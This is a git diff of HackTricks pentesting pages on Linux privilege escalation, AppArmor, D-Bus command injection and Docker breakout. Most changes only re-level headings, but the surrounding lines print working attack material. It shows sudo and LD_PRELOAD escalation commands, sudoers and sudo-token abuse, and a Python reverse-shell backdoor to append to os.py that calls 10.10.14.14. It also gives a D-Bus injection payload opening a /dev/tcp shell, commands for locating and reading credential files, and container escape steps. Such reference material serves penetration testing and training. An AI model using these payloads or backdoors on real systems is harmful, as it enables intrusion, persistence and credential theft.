If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH.
@@ -826,7 +824,7 @@ ftp>!/bin/sh
less>!
```
-## NOPASSWD
+# NOPASSWD
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
@@ -842,7 +840,7 @@ In this example the user `demo` can run `vim` as `root`, it is now trivial to ge
sudo vim -c '!sh'
```
-## SETENV
+# SETENV
This directive allows the user to **set an environment variable** while executing something:
@@ -858,7 +856,7 @@ This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPA
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
```
-## Sudo execution bypassing paths
+# Sudo execution bypassing paths
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= (root) /bin/less /var/log/\*_
@@ -881,7 +879,7 @@ sudo less /var/log/something /etc/shadow #Red 2 files
**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/)
-## Sudo command/SUID binary without command path
+# Sudo command/SUID binary without command path
If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= (root) less_ you can exploit it by changing the PATH variable
@@ -895,7 +893,7 @@ This technique can also be used if a **suid** binary **executes another command
[Payload examples to execute.](payloads-to-execute.md)
-## SUID binary with command path
+# SUID binary with command path
If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling.
@@ -908,7 +906,7 @@ export -f /usr/sbin/service
Then, when you call the suid binary, this function will be executed
-## LD\_PRELOAD
+# LD\_PRELOAD
**LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
@@ -948,7 +946,7 @@ Finally, **escalate privileges** running
sudo LD_PRELOAD=pe.so #Use any command you can run with sudo
```
-## SUID Binary – so injection
+# SUID Binary – so injection
If you find some weird binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly**. In order to do so you can execute:
@@ -979,7 +977,7 @@ gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
And execute the binary.
-## GTFOBins
+# GTFOBins
[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
@@ -992,11 +990,11 @@ The project collects legitimate functions of Unix binaries that can be abused to
{% embed url="https://gtfobins.github.io/" %}
-## FallOfSudo
+# FallOfSudo
If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/Critical-Start/FallofSudo) to check if it finds how to exploit any sudo rule.
-## Reusing Sudo Tokens
+# Reusing Sudo Tokens
In the scenario where **you have a shell as a user with sudo privileges** but you don't know the password of the user, you can **wait him to execute some command using `sudo`**. Then, you can **access the token of the session where sudo was used and use it to execute anything as sudo** (privilege escalation).
@@ -1033,7 +1031,7 @@ bash exploit_v3.sh
sudo su
```
-## /var/run/sudo/ts/\
+# /var/run/sudo/ts/\
If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo\_inject/tree/master/extra\_tools) to **create a sudo token for a user and PID**.\
For example if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing:
@@ -1042,7 +1040,7 @@ For example if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
```
-## /etc/sudoers, /etc/sudoers.d
+# /etc/sudoers, /etc/sudoers.d
The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. This files **by default can only be read by user root and group root**.\
**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**.
@@ -1068,7 +1066,7 @@ echo "Defaults !tty_tickets" > /etc/sudoers.d/win
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
```
-## DOAS
+# DOAS
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
@@ -1076,7 +1074,7 @@ There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, rem
permit nopass demo as root cmd vim
```
-## Sudo Hijacking
+# Sudo Hijacking
If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the users command. Then, **modify the $PATH** of the user context (for example adding the new path in .bash\_profile) so we the user executed sudo, your sudo executable is executed.
@@ -1084,7 +1082,7 @@ Note that if the user uses a different shell (not bash) you will need to modify
# Shared Library
-## ld.so
+# ld.so
The file `/etc/ld.so.conf` indicates **where are loaded the configurations files from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`
@@ -1097,7 +1095,7 @@ Take a look about **how to exploit this misconfiguration** in the following page
[ld.so.conf-example.md](ld.so.conf-example.md)
{% endcontent-ref %}
-## RPATH
+# RPATH
```
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
@@ -1173,7 +1171,7 @@ getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
In **old versions** you may **hijack** some **shell** session of a different user (**root**).\
In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside of the session**.
-## screen sessions hijacking
+# screen sessions hijacking
**List screen sessions**
@@ -1190,7 +1188,7 @@ screen -dr #The -d is to detacche whoever is attached to it
screen -dr 3350.foo #In the example of the image
```
-## tmux sessions hijacking
+# tmux sessions hijacking
Apparently this was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root from a non-privileged user.
@@ -1216,18 +1214,18 @@ Check **valentine box from HTB** for an example.
# SSH
-## Debian OpenSSL Predictable PRNG - CVE-2008-0166
+# Debian OpenSSL Predictable PRNG - CVE-2008-0166
All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\
This bug caused that when creating in those OS a new ssh key **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
-## SSH Interesting configuration values
+# SSH Interesting configuration values
* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`.
* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`.
* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`.
-### PermitRootLogin
+## PermitRootLogin
Specifies whether root can log in using ssh, default is `no`. Possible values:
@@ -1236,7 +1234,7 @@ Specifies whether root can log in using ssh, default is `no`. Possible values:
* `forced-commands-only`: Root can login only using privatekey cand if the commands options is specified
* `no` : no
-### AuthorizedKeysFile
+## AuthorizedKeysFile
Specifies files that contains the public keys that can be used for user authentication. I can contains tokens like `%h` , that will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the users home**. For example:
@@ -1246,7 +1244,7 @@ AuthorizedKeysFile .ssh/authorized_keys access
That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access`
-### ForwardAgent/AllowAgentForwarding
+## ForwardAgent/AllowAgentForwarding
SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**.
@@ -1266,7 +1264,7 @@ If you Forward Agent configured in an environment \[**check here how to exploit
# Interesting Files
-## Profiles files
+# Profiles files
The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user run a new shell**. Therefore, if you can **write or modify any of the you can escalate privileges**.
@@ -1276,7 +1274,7 @@ ls -l /etc/profile /etc/profile.d/
If any weird profile script is found you should check it for **sensitive details**.
-## Passwd/Shadow Files
+# Passwd/Shadow Files
Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. Therefore it's recommended **find all of hem** and **check if you can read** them and **check if there are hashes** inside the files:
@@ -1293,7 +1291,7 @@ In some occasions you can find **password hashes** inside the `/etc/passwd` (or
grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
```
-### Writable /etc/passwd
+## Writable /etc/passwd
First generate a password with one of the following commands.
@@ -1340,7 +1338,7 @@ Group=root
Your backdoor will be executed the next time that tomcat is started.
-## Check Folders
+# Check Folders
The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try)
@@ -1348,7 +1346,7 @@ The following folders may contain backups or interesting information: **/tmp**,
ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
```
-## Weird Location/Owned files
+# Weird Location/Owned files
```bash
#root owned files in /home folders
@@ -1367,38 +1365,38 @@ for g in `groups`;
done
```
-## Modified files in last mins
+# Modified files in last mins
```bash
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
```
-## Sqlite DB files
+# Sqlite DB files
```bash
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
```
-## \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files
+# \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files
```bash
fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`Hidden files
```
-## Hidden files
+# Hidden files
```bash
find / -type f -iname ".*" -ls 2>/dev/null
```
-## **Script/Binaries in PATH**
+# **Script/Binaries in PATH**
```bash
for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done
```
-## **Web files**
+# **Web files**
```bash
ls -alhR /var/www/ 2>/dev/null
@@ -1407,18 +1405,18 @@ ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
```
-## **Backups**
+# **Backups**
```bash
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/nulll
```
-## Known files containing passwords
+# Known files containing passwords
Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\
**Other interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac.
-## Logs
+# Logs
If you can read logs, you may be able to find **interesting/confidential information inside of them**. The more strange the log is, the more interesting will be (probably).\
Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
@@ -1430,7 +1428,7 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful.
-## Shell files
+# Shell files
```bash
~/.bash_profile # if it exists, read once when you log in to the shell
@@ -1443,14 +1441,14 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-g
~/.zshrc #zsh shell
```
-## Generic Creds Search/Regex
+# Generic Creds Search/Regex
You should also check for files containing the word "**password**" in it's **name** or inside the **content**, also check for IPs and emails inside logs, or hashes regexps.\
I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform.
# Writable files
-## Python library hijacking
+# Python library hijacking
If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the os library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library).
@@ -1460,7 +1458,7 @@ To **backdoor the library** just add at the end of the os.py library the followi
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
```
-## Logrotate exploitation
+# Logrotate exploitation
There is a vulnerability on `logrotate`that allows a user with **write permissions over a log file** or **any** of its **parent directories** to make `logrotate`write **a file in any location**. If **logrotate** is being executed by **root**, then the user will be able to write any file in _**/etc/bash\_completion.d/**_ that will be executed by any user that login.\
So, if you have **write perms** over a **log file** **or** any of its **parent folder**, you can **privesc** (on most linux distributions, logrotate is executed automatically once a day as **user root**). Also, check if apart of _/var/log_ there are more files being **rotated**.
@@ -1475,7 +1473,7 @@ You can exploit this vulnerability with [**logrotten**](https://github.com/whotw
This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks.
-## /etc/sysconfig/network-scripts/ (Centos/Redhat)
+# /etc/sysconfig/network-scripts/ (Centos/Redhat)
If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**.
@@ -1495,7 +1493,7 @@ DEVICE=eth0
**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist\_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f)
-## **init, init.d, systemd, and rc.d**
+# **init, init.d, systemd, and rc.d**
`/etc/init.d` contains **scripts** used by the System V init tools (SysVinit). This is the **traditional service management package for Linux**, containing the `init` program (the first process that is run when the kernel has finished initializing¹) as well as some infrastructure to start and stop services and configure them. Specifically, files in `/etc/init.d` are shell scripts that respond to `start`, `stop`, `restart`, and (when supported) `reload` commands to manage a particular service. These scripts can be invoked directly or (most commonly) via some other trigger (typically the presence of a symbolic link in `/etc/rc?.d/`). (From [here](https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d#:\~:text=%2Fetc%2Finit%20contains%20configuration%20files,the%20status%20of%20a%20service.))\
Other alternative to this folder is `/etc/rc.d/init.d` in Redhat
@@ -1507,25 +1505,25 @@ Files that ships in packages downloaded from distribution repository go into `/u
# Other Tricks
-## NFS Privilege escalation
+# NFS Privilege escalation
{% content-ref url="nfs-no_root_squash-misconfiguration-pe.md" %}
[nfs-no\_root\_squash-misconfiguration-pe.md](nfs-no\_root\_squash-misconfiguration-pe.md)
{% endcontent-ref %}
-## Escaping from restricted Shells
+# Escaping from restricted Shells
{% content-ref url="escaping-from-limited-bash.md" %}
[escaping-from-limited-bash.md](escaping-from-limited-bash.md)
{% endcontent-ref %}
-## Cisco - vmanage
+# Cisco - vmanage
{% content-ref url="cisco-vmanage.md" %}
[cisco-vmanage.md](cisco-vmanage.md)
{% endcontent-ref %}
-## Kernel Security Protections
+# Kernel Security Protections
* [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
* [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map)
@@ -1536,7 +1534,7 @@ Files that ships in packages downloaded from distribution repository go into `/u
# Linux/Unix Privesc Tools
-## **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+# **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\
**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
diff --git a/linux-unix/privilege-escalation/apparmor.md b/linux-unix/privilege-escalation/apparmor.md
index bf0b354a..53a97b92 100644
--- a/linux-unix/privilege-escalation/apparmor.md
+++ b/linux-unix/privilege-escalation/apparmor.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# AppArmor
-
-## Basic Information
+# Basic Information
**AppArmor** is a kernel enhancement to confine **programs** to a **limited** set of **resources **with **per-program profiles**. Profiles can **allow** **capabilities** like network access, raw socket access, and the permission to read, write, or execute files on matching paths.
@@ -32,21 +30,21 @@ AppArmor profiles can be in one of **two modes**:
AppArmor differs from some other MAC systems on Linux: it is **path-based**, it allows mixing of enforcement and complain mode profiles, it uses include files to ease development, and it has a far lower barrier to entry than other popular MAC systems.
-### Parts of AppArmor
+## Parts of AppArmor
* **Kernel module**: Does the actual work
* **Policies**: Defines the behaviour and containment
* **Parser**: Loads the policies into kernel
* **Utilities**: Usermode programs to interact with apparmor
-### Profiles path
+## Profiles path
Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\
With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder.
For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_
-### Commands
+## Commands
```bash
aa-status #check the current status
@@ -58,7 +56,7 @@ aa-logprof #used to change the policy when the binary/program is changed
aa-mergeprof #used to merge the policies
```
-## Creating a profile
+# Creating a profile
* In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files.
* To indicate the access the binary will have over **files** the following **access controls** can be used:
@@ -74,7 +72,7 @@ aa-mergeprof #used to merge the policies
* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file)
* **Deny rules are supported to override allow rules**.
-### aa-genprof
+## aa-genprof
To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\
You just need to run:
@@ -95,7 +93,7 @@ Then, in the first console press "**s**" and then in the recorded actions indica
Using the arrow keys you can select what you want to allow/deny/whatever
{% endhint %}
-### aa-easyprof
+## aa-easyprof
You can also create a template of an apparmor profile of a binary with:
@@ -134,7 +132,7 @@ You can then **enforce** the new profile with
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
-### Modifying a profile from logs
+## Modifying a profile from logs
The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions:
@@ -146,7 +144,7 @@ sudo aa-logprof
Using the arrow keys you can select what you want to allow/deny/whatever
{% endhint %}
-### Managing a Profile
+## Managing a Profile
```bash
#Main profile management commands
@@ -156,7 +154,7 @@ apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile
apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
-## Logs
+# Logs
Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**:
@@ -185,7 +183,7 @@ AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
-## Apparmor in Docker
+# Apparmor in Docker
Note how the profile **docker-profile** of docker is loaded by default:
@@ -249,7 +247,7 @@ Note that you can **add/remove** **capabilities** to the docker container (this
Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**.
{% endhint %}
-### AppArmor Docker breakout
+## AppArmor Docker breakout
You can find which **apparmor profile is running a container** using:
diff --git a/linux-unix/privilege-escalation/cisco-vmanage.md b/linux-unix/privilege-escalation/cisco-vmanage.md
index 7645faad..aa5783ae 100644
--- a/linux-unix/privilege-escalation/cisco-vmanage.md
+++ b/linux-unix/privilege-escalation/cisco-vmanage.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Cisco - vmanage
-
-## Path 1
+# Path 1
(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))
@@ -68,7 +66,7 @@ vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
```
-## Path 2
+# Path 2
(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))
diff --git a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
index 3f427ea6..8b77d42f 100644
--- a/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Containerd (ctr) Privilege Escalation
-
-## Basic information
+# Basic information
Go to the following link to learn **what is containerd** and `ctr`:
@@ -27,7 +25,7 @@ Go to the following link to learn **what is containerd** and `ctr`:
[2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}
-## PE 1
+# PE 1
if you find that a host contains the `ctr` command:
@@ -51,13 +49,13 @@ And then **run one of those images mounting the host root folder to it**:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
-## PE 2
+# PE 2
Run a container privileged and escape from it.\
You can run a privileged container as:
```bash
- ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
+ ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**:
diff --git a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
index 4858ee5c..38054a16 100644
--- a/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# D-Bus Enumeration & Command Injection Privilege Escalation
-
-## **GUI enumeration**
+# **GUI enumeration**
**(This enumeration info was taken from** [**https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/**](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)**)**
@@ -59,9 +57,9 @@ _Figure 4. A method that requires authorization_
Also note that some of the services query another D-Bus service named org.freedeskto.PolicyKit1 whether a user should be allowed to perform certain actions or not.
-## **Cmd line Enumeration**
+# **Cmd line Enumeration**
-### List Service Objects
+## List Service Objects
It's possible to list opened D-Bus interfaces with:
@@ -89,11 +87,11 @@ org.freedesktop.hostname1 - - - (act
org.freedesktop.locale1 - - - (activatable) - -
```
-#### Connections
+### Connections
When a process sets up a connection to a bus, the bus assigns to the connection a special bus name called _unique connection name_. Bus names of this type are immutable—it's guaranteed they won't change as long as the connection exists—and, more importantly, they can't be reused during the bus lifetime. This means that no other connection to that bus will ever have assigned such unique connection name, even if the same process closes down the connection to the bus and creates a new one. Unique connection names are easily recognizable because they start with the—otherwise forbidden—colon character.
-### Service Object Info
+## Service Object Info
Then, you can obtain some information about the interface with:
@@ -157,7 +155,7 @@ BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_wake_alarm cap_block_suspend cap_audit_read
```
-### List Interfaces of a Service Object
+## List Interfaces of a Service Object
You need to have enough permissions.
@@ -169,7 +167,7 @@ busctl tree htb.oouch.Block #Get Interfaces of the service object
└─/htb/oouch/Block
```
-### Introspect Interface of a Service Object
+## Introspect Interface of a Service Object
Note how in this example it was selected the latest interface discovered using the `tree` parameter (_see previous section_):
@@ -193,7 +191,7 @@ org.freedesktop.DBus.Properties interface - - -
Note the method `.Block` of the interface `htb.oouch.Block` (the one we are interested in). The "s" of the other columns may mean that it's expecting a string.
-### Monitor/Capture Interface
+## Monitor/Capture Interface
With enough privileges (just `send_destination` and `receive_sender` privileges aren't enough) you can **monitor a D-Bus communication**.
@@ -234,7 +232,7 @@ Monitoring bus message stream.
You can use `capture` instead of `monitor` to save the results in a pcap file.
-#### Filtering all the noise
+### Filtering all the noise
If there is just too much information on the bus, pass a match rule like so:
@@ -256,11 +254,11 @@ See the [D-Bus documentation](http://dbus.freedesktop.org/doc/dbus-specification
-### More
+## More
`busctl` have even more options, [**find all of them here**](https://www.freedesktop.org/software/systemd/man/busctl.html).
-## **Vulnerable Scenario**
+# **Vulnerable Scenario**
As user **qtc inside the host "oouch" from HTB** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
@@ -306,7 +304,7 @@ As you can see, it is **connecting to a D-Bus interface** and sending to the **"
In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\
**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
-### Exploit it
+## Exploit it
At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the **_**D-Bus object path**_ **and **_**interface name**_** are registered**. This information will be necessary to send information to the D-Bus connection:
@@ -326,7 +324,7 @@ Also, in line 57 you can find that **the only method registered** for this D-Bus
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
```
-#### Python
+### Python
The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` (_note that it was extracted from the previous chunk of code_):
@@ -340,7 +338,7 @@ response = block_iface.Block(runme)
bus.close()
```
-#### busctl and dbus-send
+### busctl and dbus-send
```bash
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
@@ -355,7 +353,7 @@ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oou
_Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._
-### C code
+## C code
{% code title="d-bus_server.c" %}
```c
diff --git a/linux-unix/privilege-escalation/docker-breakout.md b/linux-unix/privilege-escalation/docker-breakout.md
index 7a69d83a..81dce469 100644
--- a/linux-unix/privilege-escalation/docker-breakout.md
+++ b/linux-unix/privilege-escalation/docker-breakout.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker Breakout
-
-## What is a container
+# What is a container
In summary, it's an **isolated** **process** via **cgroups** (what the process can use, like CPU and RAM) and **namespaces** (what the process can see, like directories or other processes):
@@ -29,7 +27,7 @@ ps -ef | grep 1234 #Get info about the sleep process
ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it)
```
-## Mounted docker socket
+# Mounted docker socket
If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\
This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions.
@@ -53,7 +51,7 @@ docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash
In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`**
{% endhint %}
-## Container Capabilities
+# Container Capabilities
You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE`**
@@ -69,11 +67,11 @@ In the following page you can **learn more about linux capabilities** and how to
[linux-capabilities.md](linux-capabilities.md)
{% endcontent-ref %}
-## `--privileged` flag
+# `--privileged` flag
The --privileged flag allows the container to have access to the host devices.
-### I own Root
+## I own Root
Well configured docker containers won't allow command like **fdisk -l**. However on missconfigured docker command where the flag --privileged is specified, it is possible to get the privileges to see the host drive.
@@ -147,7 +145,7 @@ Further, Docker [starts containers with the `docker-default` AppArmor](https://d
A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN`
-### Breaking down the proof of concept
+## Breaking down the proof of concept
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.
@@ -216,11 +214,11 @@ root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
```
-## `--privileged` flag v2
+# `--privileged` flag v2
The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point.
-### Kata Containers
